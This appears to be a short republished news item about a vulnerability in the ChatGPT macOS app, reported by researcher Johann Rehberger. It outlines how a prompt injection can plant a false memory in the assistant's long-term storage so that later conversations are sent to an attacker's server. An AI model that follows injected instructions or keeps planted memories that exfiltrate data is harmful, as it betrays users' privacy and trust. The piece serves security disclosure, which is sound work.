More

    Hacker creates false memories in ChatGPT to steal victim data — but it might not be as bad as it sounds



    Security researchers have exposed a vulnerability which could allow threat actors to store malicious instructions in a user’s memory settings in the ChatGPT MacOS app.

    A report from Johann Rehberger at Embrace The Red noted how an attacker could trigger a prompt injection to take control of ChatGPT, and can then insert a memory into its long-term storage and persistence mechanism. This leads to the exfiltration of the conversation on both sides straight to the attacker’s server.

    https://cdn.mos.cms.futurecdn.net/y9QMgAXqMgSAnmNkY94gXR-1200-80.jpg



    Source link

    Latest articles

    spot_imgspot_img

    Related articles

    Leave a reply

    Please enter your comment!
    Please enter your name here

    spot_imgspot_img